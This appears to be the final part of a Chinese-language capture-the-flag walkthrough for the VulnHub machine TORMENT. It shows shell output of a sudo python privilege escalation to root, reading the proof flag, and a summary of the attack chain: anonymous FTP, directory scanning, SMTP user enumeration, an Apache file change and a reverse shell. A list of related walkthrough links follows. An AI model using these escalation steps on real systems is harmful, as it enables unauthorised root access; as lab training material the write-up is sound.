uid=1000(qiu) gid=33(www-data) groups=33(www-data),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
$ python -c 'import pty;pty.spawn("/bin/bash")'
qiu@TORMENT:/$
然后进行信息收集
qiu@TORMENT:/$ sudo -l
sudo -l
Matching Defaults entries for qiu on TORMENT:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser qiu may run the following commands on TORMENT:(ALL) NOPASSWD: /usr/bin/python, /bin/systemctl
发现python可以进行sudo提权
qiu@TORMENT:/$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
root@TORMENT:/# cd /root
cd /root
root@TORMENT:~# ls -al
ls -al
total 44
drwx------ 6 root root 4096 Jan 4 2019 .
drwxr-xr-x 23 root root 4096 Jan 4 2019 ..
-rw------- 1 root root 56 Jan 4 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 2 root root 4096 Dec 23 2018 .cache
drwx------ 5 root root 4096 Dec 31 2018 .config
drwxr-xr-x 3 root root 4096 Dec 31 2018 .local
drwxr-xr-x 2 root root 4096 Dec 24 2018 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
---------- 1 root root 1329 Jan 4 2019 author-secret.txt
---------- 1 root root 128 Dec 31 2018 proof.txt
root@TORMENT:~# cat proof.txt
cat proof.txt
Congrutulations on rooting TORMENT. I hope this box has been as fun for you as it has been for me. :-)Until then, try harder!
root@TORMENT:~#
成功提权并拿到flag
总结
本靶机首先通过ftp信息收集得到用户信息及id_rsa,然后通过CUPS收集用户表,再通过hexchat得到用户密码,ssh登录后更改apache文件,重启靶机后反弹shell,最后通过sudo提权。
- ftp匿名登录
- gobuster目录扫描
- curl创建用户表
- msf进行枚举smtp用户
- hexchat信息收集
- apache2文件修改
- sudo提权-Python提权
靶机渗透练习56-digitalworld.local:TORMENT相关推荐
- 靶机渗透练习58-digitalworld.local:VENGEANCE
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us ...
- 靶机渗透练习53-digitalworld.local:BRAVERY
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...
- 17. CTF综合靶机渗透(十)
靶机描述: 欢迎来到超级马里奥主机! 这个虚拟机是对真实世界场景场景的模拟. 目标是在VM中找到2个标志.根是不够的(对不起!) VM可以以多种方式开发,但请记住枚举是关键. 挑战的程度是中等的. 感 ...
- 靶机渗透测试(covfefe)
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...
- dc-3 靶机渗透学习
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...
- HackInOS靶机渗透writeup
HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP. 成功后打开的靶机图如下 0x01渗透过程 使用 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
最新文章
- 大二上学期软件工程概论学习进度表(第十二周)
- 安卓学习 之 广播(五)
- 前端学习(902):this指向问题
- 数列求和(洛谷P5745题题解,C++语言描述)
- Mr.J--Java异常处理总结
- 入门机器学习(一)--单变量线性回归
- Python文件的操作2
- android get方法的使用方法,android之HttpPostHttpGet使用方法介绍
- 怎么增加C盘空间大小,教你如何调整C盘容量【图文教程 无损数据】分区助手如何给磁盘分区 分区助手使用方法教程
- 日志易智能日志分析助力农信银双十一运维降本增效
- (10)python日志收集
- 目前三大前端主流框架
- 机器学习-决策树之分类树python实战(以红酒数据集为例)(二)
- web网页设计实例作业 ——中国茶文化(6页) 茶文化网页制作作业_中国化(网页设计...
- Proximal Gradient for LASSO
- Day07:常用模块,面向对象编程(对象类)及内置函数
- android 清理后自动重启,解决Android后台清理APP后,程序自动重启的问题
- 中青网财经:请一位心理学博士当CTO 只有马云敢这么做
- JS高级程序设计读书笔记(第五章 引用变量)
- 163邮箱 提示xm002 NO SELECT Unsafe Login. Please contact kefu@188.com for help